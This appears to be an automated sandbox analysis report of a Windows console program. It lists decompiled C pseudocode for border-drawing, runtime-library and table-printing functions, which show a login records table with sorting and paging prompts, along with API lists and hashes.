                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E00D81320(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebp;
				intOrPtr _t61;
				intOrPtr _t67;
				void* _t75;
				intOrPtr _t87;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t102 = __esi;
				_t101 = __edi;
				E00D81250(_a4, _a8);
				_push(0xc9);
				_push("%c");
				E00D870FC(_t75, __edi, __esi, __eflags);
				_t104 = _t103 + 8;
				_v8 = _a4 + 1;
				while(1) {
					_t109 = _v8 - _a12 - 1;
					if(_v8 >= _a12 - 1) {
						break;
					}
					E00D81250(_v8, _a8);
					_push(0xcd);
					_push("%c");
					E00D870FC(_t75, _t101, _t102, _t109);
					_t104 = _t104 + 8;
					_v8 = _v8 + 1;
				}
				E00D81250(_v8, _a8);
				_push(0xbb);
				_push("%c");
				E00D870FC(_t75, _t101, _t102, __eflags);
				_t105 = _t104 + 8;
				_v12 = _a8 + 1;
				while(1) {
					__eflags = _v12 - _a16;
					if(__eflags >= 0) {
						break;
					}
					E00D81250(_a4, _v12);
					_v8 = _a4;
					while(1) {
						__eflags = _v8 - _a12;
						if(_v8 >= _a12) {
							break;
						}
						__eflags = _v8 - _a4;
						if(__eflags == 0) {
							L12:
							E00D81250(_v8, _v12);
							_push(0xba);
							_push("%c");
							E00D870FC(_t75, _t101, _t102, __eflags);
							_t105 = _t105 + 8;
						} else {
							__eflags = _v8 - _a12 - 1;
							if(__eflags == 0) {
								goto L12;
							}
						}
						_t67 = _v8 + 1;
						__eflags = _t67;
						_v8 = _t67;
					}
					_t87 = _v12 + 1;
					__eflags = _t87;
					_v12 = _t87;
				}
				E00D81250(_a4, _v12);
				_push(0xc8);
				_push("%c");
				E00D870FC(_t75, _t101, _t102, __eflags);
				_t106 = _t105 + 8;
				_v8 = _a4 + 1;
				while(1) {
					__eflags = _v8 - _a12 - 1;
					if(__eflags >= 0) {
						break;
					}
					E00D81250(_v8, _v12);
					_push(0xcd);
					_push("%c");
					E00D870FC(_t75, _t101, _t102, __eflags);
					_t106 = _t106 + 8;
					_t61 = _v8 + 1;
					__eflags = _t61;
					_v8 = _t61;
				}
				E00D81250(_v8, _v12);
				_push(0xbc);
				_push("%c");
				return E00D870FC(_t75, _t101, _t102, __eflags);
			}














                                              0x00d81320
                                              0x00d81320
                                              0x00d8132e
                                              0x00d81333
                                              0x00d81338
                                              0x00d8133d
                                              0x00d81342
                                              0x00d8134b
                                              0x00d81359
                                              0x00d8135f
                                              0x00d81362
                                              0x00000000
                                              0x00000000
                                              0x00d8136c
                                              0x00d81371
                                              0x00d81376
                                              0x00d8137b
                                              0x00d81380
                                              0x00d81356
                                              0x00d81356
                                              0x00d8138d
                                              0x00d81392
                                              0x00d81397
                                              0x00d8139c
                                              0x00d813a1
                                              0x00d813aa
                                              0x00d813b8
                                              0x00d813bb
                                              0x00d813be
                                              0x00000000
                                              0x00000000
                                              0x00d813c8
                                              0x00d813d0
                                              0x00d813de
                                              0x00d813e1
                                              0x00d813e4
                                              0x00000000
                                              0x00000000
                                              0x00d813e9
                                              0x00d813ec
                                              0x00d813f9
                                              0x00d81401
                                              0x00d81406
                                              0x00d8140b
                                              0x00d81410
                                              0x00d81415
                                              0x00d813ee
                                              0x00d813f4
                                              0x00d813f7
                                              0x00000000
                                              0x00000000
                                              0x00d813f7
                                              0x00d813d8
                                              0x00d813d8
                                              0x00d813db
                                              0x00d813db
                                              0x00d813b2
                                              0x00d813b2
                                              0x00d813b5
                                              0x00d813b5
                                              0x00d81424
                                              0x00d81429
                                              0x00d8142e
                                              0x00d81433
                                              0x00d81438
                                              0x00d81441
                                              0x00d8144f
                                              0x00d81455
                                              0x00d81458
                                              0x00000000
                                              0x00000000
                                              0x00d81462
                                              0x00d81467
                                              0x00d8146c
                                              0x00d81471
                                              0x00d81476
                                              0x00d81449
                                              0x00d81449
                                              0x00d8144c
                                              0x00d8144c
                                              0x00d81483
                                              0x00d81488
                                              0x00d8148d
                                              0x00d8149d

                                              APIs
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D8133D
                                              • _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D8139C
                                              • _wprintf.LIBCMT ref: 00D81410
                                              • _wprintf.LIBCMT ref: 00D81433
                                              • _wprintf.LIBCMT ref: 00D81471
                                              • _wprintf.LIBCMT ref: 00D81492
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                              • String ID:
                                              • API String ID: 1778593935-0
                                              • Opcode ID: 0302356a46c06641ccb3b08ef1bdc9112c1c3a2a439852b2d9d95d2ae83ac77b
                                              • Instruction ID: b0b32b13d14405165fb373ec189598b213a525d5f5c993c981c4c2d853cedbd7
                                              • Opcode Fuzzy Hash: 0302356a46c06641ccb3b08ef1bdc9112c1c3a2a439852b2d9d95d2ae83ac77b
                                              • Instruction Fuzzy Hash: 00414F79A10208FFCB04FF98CD82E9E7779EF84704F208159F505AB281D631EA5A9B75
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8D672, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E00D8D672(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00D8759E(_t3);
				if(E00D8BF2E() != 0) {
					_t6 = E00D8BF78(_t5, E00D8D408);
					 *0xda1a40 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00D8C4FB(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00D8D6E8();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00D8BFA2(_t9,  *0xda1a40, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00D8D5C6(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00D8D6E8();
					return 0;
				}
			}








                                              0x00d8d672
                                              0x00d8d67e
                                              0x00d8d68d
                                              0x00d8d693
                                              0x00d8d698
                                              0x00d8d69b
                                              0x00000000
                                              0x00d8d69d
                                              0x00d8d6aa
                                              0x00d8d6ae
                                              0x00d8d6b0
                                              0x00d8d6df
                                              0x00d8d6df
                                              0x00d8d6e4
                                              0x00d8d6e7
                                              0x00d8d6b2
                                              0x00d8d6c0
                                              0x00d8d6c2
                                              0x00000000
                                              0x00d8d6c4
                                              0x00d8d6c4
                                              0x00d8d6c6
                                              0x00d8d6c7
                                              0x00d8d6ce
                                              0x00d8d6d4
                                              0x00d8d6d8
                                              0x00d8d6dc
                                              0x00d8d6de
                                              0x00d8d6de
                                              0x00d8d6c2
                                              0x00d8d6b0
                                              0x00d8d680
                                              0x00d8d680
                                              0x00d8d680
                                              0x00d8d687
                                              0x00d8d687

                                              APIs
                                              • __init_pointers.LIBCMT ref: 00D8D672
                                                • Part of subcall function 00D8759E: EncodePointer.KERNEL32(00000000,?,00D8D677,00D888CB,00D9D838,00000014), ref: 00D875A1
                                                • Part of subcall function 00D8759E: __initp_misc_winsig.LIBCMT ref: 00D875C2
                                              • __mtinitlocks.LIBCMT ref: 00D8D677
                                                • Part of subcall function 00D8BF2E: InitializeCriticalSectionAndSpinCount.KERNEL32(00DA13D0,00000FA0,?,?,00D8D67C,00D888CB,00D9D838,00000014), ref: 00D8BF4C
                                              • __mtterm.LIBCMT ref: 00D8D680
                                              • __calloc_crt.LIBCMT ref: 00D8D6A5
                                              • __initptd.LIBCMT ref: 00D8D6C7
                                              • GetCurrentThreadId.KERNEL32 ref: 00D8D6CE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                              • String ID:
                                              • API String ID: 2211675822-0
                                              • Opcode ID: bbec1664040fa2c146b2b45b54ec08aa3885de52818c7e438eb4495dcabcf227
                                              • Instruction ID: 5103b1754ab601b5d586d23889fa0107d2ca17a31c6e5434bfc6d2464aff05fd
                                              • Opcode Fuzzy Hash: bbec1664040fa2c146b2b45b54ec08aa3885de52818c7e438eb4495dcabcf227
                                              • Instruction Fuzzy Hash: DCF0903624A7696AE2247B7D7C0365A3786CF42770B34061AF459D51E1FF2298424774
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8BB0C, Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E00D8BB0C(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E00D8A547(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E00D88B52(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E00D88C10();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E00D91187(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E00D88C10();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E00D918CE(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E00D902E3(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									_t25 = _t87 + 1; // 0x1a06
									 *_t92 = _t25;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0xda1390;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0xda2f60 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E00D91754(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E00D902E3(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E00D88E9F(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E00D88E9F(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                              0x00d8bb10
                                              0x00d8bb17
                                              0x00d8bb1f
                                              0x00d8bb24
                                              0x00d8bb2a
                                              0x00d8bb2d
                                              0x00d8bb2f
                                              0x00d8bb32
                                              0x00d8bb41
                                              0x00d8bb44
                                              0x00d8bb5e
                                              0x00d8bb60
                                              0x00d8bb63
                                              0x00d8bb78
                                              0x00d8bb7e
                                              0x00d8bb81
                                              0x00d8bb84
                                              0x00d8bb87
                                              0x00d8bb8c
                                              0x00d8bb8e
                                              0x00d8bb96
                                              0x00d8bb98
                                              0x00d8bba6
                                              0x00d8bba7
                                              0x00d8bbad
                                              0x00d8bbaf
                                              0x00000000
                                              0x00000000
                                              0x00d8bb9a
                                              0x00d8bb9a
                                              0x00d8bba2
                                              0x00d8bba4
                                              0x00d8bbb1
                                              0x00d8bbb2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8bba4
                                              0x00d8bb98
                                              0x00d8bbb8
                                              0x00d8bbbf
                                              0x00d8bc3d
                                              0x00d8bc3e
                                              0x00d8bc3f
                                              0x00d8bc45
                                              0x00d8bc46
                                              0x00d8bc47
                                              0x00d8bc4f
                                              0x00000000
                                              0x00d8bbc1
                                              0x00d8bbc1
                                              0x00d8bbc6
                                              0x00d8bbc9
                                              0x00d8bbce
                                              0x00d8bbd1
                                              0x00d8bbd4
                                              0x00d8bbd7
                                              0x00d8bbd9
                                              0x00d8bbf2
                                              0x00d8bbf5
                                              0x00d8bc12
                                              0x00d8bc12
                                              0x00d8bbf7
                                              0x00d8bbf7
                                              0x00d8bbfa
                                              0x00000000
                                              0x00d8bbfc
                                              0x00d8bc09
                                              0x00d8bc09
                                              0x00d8bbfa
                                              0x00d8bc17
                                              0x00d8bc1b
                                              0x00000000
                                              0x00d8bc1d
                                              0x00d8bc1d
                                              0x00d8bc1f
                                              0x00d8bc20
                                              0x00d8bc21
                                              0x00d8bc27
                                              0x00d8bc2c
                                              0x00d8bc2f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8bc2f
                                              0x00d8bbdb
                                              0x00d8bbdb
                                              0x00d8bbdc
                                              0x00d8bbdd
                                              0x00d8bbe6
                                              0x00d8bc31
                                              0x00d8bc34
                                              0x00d8bc37
                                              0x00d8bc51
                                              0x00d8bc51
                                              0x00d8bc54
                                              0x00d8bc5f
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00000000
                                              0x00d8bc56
                                              0x00d8bc54
                                              0x00d8bbd9
                                              0x00d8bb65
                                              0x00d8bb65
                                              0x00d8bb68
                                              0x00d8bb6b
                                              0x00d8bbed
                                              0x00d8bc5a
                                              0x00d8bc5a
                                              0x00d8bb6d
                                              0x00d8bb70
                                              0x00d8bb70
                                              0x00d8bb73
                                              0x00d8bb75
                                              0x00000000
                                              0x00d8bb75
                                              0x00d8bb6b
                                              0x00d8bb46
                                              0x00d8bb46
                                              0x00d8bb4b
                                              0x00000000
                                              0x00d8bb4b
                                              0x00d8bb34
                                              0x00d8bb34
                                              0x00d8bb39
                                              0x00d8bb51
                                              0x00d8bb51
                                              0x00d8bb55
                                              0x00d8bb55
                                              0x00d8bc67
                                              0x00d8bb19
                                              0x00d8bb1d
                                              0x00d8bb1d

                                              APIs
                                              • __ioinit.LIBCMT ref: 00D8BB10
                                                • Part of subcall function 00D8A547: InitOnceExecuteOnce.KERNEL32(00DA229C,00D8A582,00000000,00000000,00D911A5,?,?,00D89826,00000000,?,?,?,00D8714D,-00000020,00D9D7B8,0000000C), ref: 00D8A555
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Once$ExecuteInit__ioinit
                                              • String ID:
                                              • API String ID: 129814473-0
                                              • Opcode ID: 7ba4d56fffb3502403aaf761c1d2a598d472e4eb1a789f79f3898d195fd18ee7
                                              • Instruction ID: 3dbc1e2488b415a55d8f164de93a3f1a2d79624effbe148f7764e7ae1ae8c599
                                              • Opcode Fuzzy Hash: 7ba4d56fffb3502403aaf761c1d2a598d472e4eb1a789f79f3898d195fd18ee7
                                              • Instruction Fuzzy Hash: F241D371500B059FD724AB79C892A7A7BA4EF45370F18861EE4A6C72D1EB74E8409B30
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D91CC6, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00D91CC6(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xda2a68, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xda2a64 - _t7;
								if(__eflags == 0) {
									_t9 = E00D88E9F(__eflags);
									 *_t9 = E00D88EB2(GetLastError());
									goto L17;
								} else {
									__eflags = E00D8C68E(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00D88E9F(__eflags);
										 *_t12 = E00D88EB2(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00D8C68E(_t6, _t31);
						 *((intOrPtr*)(E00D88E9F(__eflags))) = 0xc;
						goto L12;
					} else {
						E00D88EF3(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00D87765(__ebx, __edx, __edi, _a8);
				}
			}









                                              0x00d91ccd
                                              0x00d91cdb
                                              0x00d91cde
                                              0x00d91ce0
                                              0x00d91cef
                                              0x00d91d22
                                              0x00d91d22
                                              0x00d91d25
                                              0x00000000
                                              0x00000000
                                              0x00d91cf2
                                              0x00d91cf4
                                              0x00d91cf6
                                              0x00d91cf6
                                              0x00d91cf6
                                              0x00d91d03
                                              0x00d91d09
                                              0x00d91d0b
                                              0x00d91d0d
                                              0x00d91d6d
                                              0x00d91d6d
                                              0x00d91d0f
                                              0x00d91d0f
                                              0x00d91d15
                                              0x00d91d57
                                              0x00d91d6b
                                              0x00000000
                                              0x00d91d17
                                              0x00d91d1e
                                              0x00d91d20
                                              0x00d91d3f
                                              0x00d91d53
                                              0x00d91d39
                                              0x00d91d39
                                              0x00d91d39
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d91d20
                                              0x00d91d15
                                              0x00000000
                                              0x00d91d3b
                                              0x00d91d28
                                              0x00d91d33
                                              0x00000000
                                              0x00d91ce2
                                              0x00d91ce5
                                              0x00d91ceb
                                              0x00d91ceb
                                              0x00d91d3c
                                              0x00d91d3e
                                              0x00d91ccf
                                              0x00d91cd9
                                              0x00d91cd9

                                              APIs
                                              • _malloc.LIBCMT ref: 00D91CD2
                                                • Part of subcall function 00D87765: __FF_MSGBANNER.LIBCMT ref: 00D8777C
                                                • Part of subcall function 00D87765: __NMSG_WRITE.LIBCMT ref: 00D87783
                                                • Part of subcall function 00D87765: HeapAlloc.KERNEL32(01430000,00000000,00000001,00000000,00000000,00000000,?,00D8C55B,00000000,00000000,00000000,00000000,?,00D8BEC8,00000018,00D9D900), ref: 00D877A8
                                              • _free.LIBCMT ref: 00D91CE5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocHeap_free_malloc
                                              • String ID:
                                              • API String ID: 2734353464-0
                                              • Opcode ID: 7e8d11a3804946a9dbc8a7c652bb28a547d2978d11c1ba726d7aa9f26f235918
                                              • Instruction ID: cdce7c3ece98b575e0d9b4dafc53735cb4f4ca3e90ffcc8558ff55c6eba36e45
                                              • Opcode Fuzzy Hash: 7e8d11a3804946a9dbc8a7c652bb28a547d2978d11c1ba726d7aa9f26f235918
                                              • Instruction Fuzzy Hash: 28117336905317ABCF313B75AC056AA3798EF01360F544925F9899A291EF75C880A7B0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8851D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00D885AD
                                                • Part of subcall function 00D8E7E0: __87except.LIBCMT ref: 00D8E81B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 26ac1552964ab015491f5dddb2d1f08138c357a33b38d8bd88e77ae8eb81b4ca
                                              • Instruction ID: b72e9c704fc3e10d6bed10843bd7cd7a500e25c12ee37dfb4e96d1f2154d6a4c
                                              • Opcode Fuzzy Hash: 26ac1552964ab015491f5dddb2d1f08138c357a33b38d8bd88e77ae8eb81b4ca
                                              • Instruction Fuzzy Hash: B7514C61E0820296DB11B718CD4237E3BA4EB41750F688DA9F4D5822E5EF74CC94AF76
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8341B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00D8341B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t218;
				void* _t228;
				void* _t249;
				void* _t270;
				void* _t283;
				void* _t287;
				void* _t306;
				intOrPtr _t307;
				void* _t309;
				intOrPtr _t310;
				void* _t313;
				void* _t314;
				intOrPtr _t320;
				void* _t336;
				intOrPtr _t364;
				void* _t371;
				intOrPtr _t394;
				void* _t397;
				void* _t421;
				void* _t433;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t442;
				void* _t443;
				void* _t446;
				void* _t448;
				void* _t450;
				void* _t451;
				void* _t457;

				L0:
				while(1) {
					L0:
					_t457 = __fp0;
					_t421 = __esi;
					_t397 = __edi;
					_t314 = __ebx;
					 *(_t433 - 8) = 1 +  *(_t433 - 8);
					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
					while(1) {
						L69:
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
						if(__eflags < 0) {
						}
						L70:
						E00D81250(5,  *(_t433 - 0xc) + 0xa);
						_push(1 +  *(_t433 - 8));
						_push("%d.");
						E00D870FC(_t314, _t397, _t421, __eflags);
						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_t270 = E00D88260( *((intOrPtr*)(_t433 - 0x10)) + _t181);
						_t448 = _t435 + 0xc;
						__eflags = _t270 - 0xa;
						if(__eflags < 0) {
							_t336 =  *(_t433 - 8) * 0x45;
							__eflags = _t336;
							_t185 = _t336 + 0x22; // 0x23
							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
							E00D81640(_t397, _t421, _t457);
						}
						L72:
						E00D81250(9,  *(_t433 - 0xc) + 0xa);
						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
						_push("%s\t\t%s\t%s\t\t%s");
						E00D870FC(_t314, _t397, _t421, __eflags);
						_t435 = _t448 + 0x14;
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
							L74:
							goto L0;
						} else {
							L73:
							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
						}
						L75:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if( *((char*)(_t433 - 1)) == 0x53) {
							L77:
							 *(_t433 - 0x34) = 1;
						} else {
							L76:
							__eflags =  *((char*)(_t433 - 1)) - 0x73;
							if( *((char*)(_t433 - 1)) == 0x73) {
								goto L77;
							}
						}
						L78:
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if( *((char*)(_t433 - 1)) == 0x20) {
							_t322 =  *(_t433 - 8);
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
						}
						L81:
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if(__eflags == 0) {
							L50:
							E00D82080(_t322, _t397, _t421, __eflags, _t457);
							__eflags =  *(_t433 - 0x14) - 0xc;
							if(__eflags >= 0) {
								E00D81250(0xf, 0x15);
								_push("Press SPACE BAR to view more data");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							} else {
								E00D81250(8, 0x15);
								_push("Press S to toggle Sorting between ascending or descending order.");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							}
							L53:
							E00D81250(5, 8);
							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
